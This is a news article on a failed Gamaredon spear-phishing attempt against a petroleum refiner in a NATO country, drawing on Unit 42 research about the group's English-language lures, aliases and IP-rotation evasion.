The Russia-linked Gamaredon group is found to have attempted to break into a large petroleum refining company within a NATO member state earlier this year amid the ongoing Russo-Ukrainian war.
The attack reportedly took place on Aug. 30 and was deemed unsuccessful. It is one of the multiple intrusions orchestrated by the advanced persistent threat (APT) that's attributed to Russia's Federal Security Service (FSB).
"This group's operations are regularly caught by researchers and government organizations, and yet they don't seem to care. They simply add additional obfuscation, new domains, and new techniques and try again – often even reusing previous samples," researchers claim, according to Cyber News.
The research, published Tuesday by Palo Alto Networks Unit 42, found that the hacking group was using English-language lures to boost its "intelligence collection and network access against Ukrainian and NATO allies."
Unit 42 reported that the group primarily uses HTML and Word documents as spear phishing lures, which are now also increasingly using the English language alongside its traditional efforts targeting Ukrainian entities with Ukrainian language lures.
The filenames used in the failed attack were: MilitaryassistanceofUkraine.htm, Necessary_military_assistance.rar, and List of necessary things for the provision of military humanitarian assistance to Ukraine.lnk.
The report did not include the name of the petroleum company or the country where the facility is located.
Gamaredon, also known by the monikers Actinium, Armageddon, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, and Winterflounder, has a history of targeting Ukrainian entities and, to a lesser extent, NATO allies to harvest sensitive data.
Cyber espionage against non-Ukrainian targets has been on the rise in recent weeks, with multiple examples spilling into the public eye. For example, another set of suspected Russian hackers tried to break into six military, technology, or logistics firms in the US and Europe that do work with Ukraine, French cybersecurity firm Sekoia.io reported.
According to Unit 42, hackers have been trying to evade detection by frequently changing the internet protocol (IP) addresses they use for their operations. IP addresses are unique numbers that identify computers online, and in one instance, the hackers made it look like the activity was coming from an IP address owned by the Pentagon.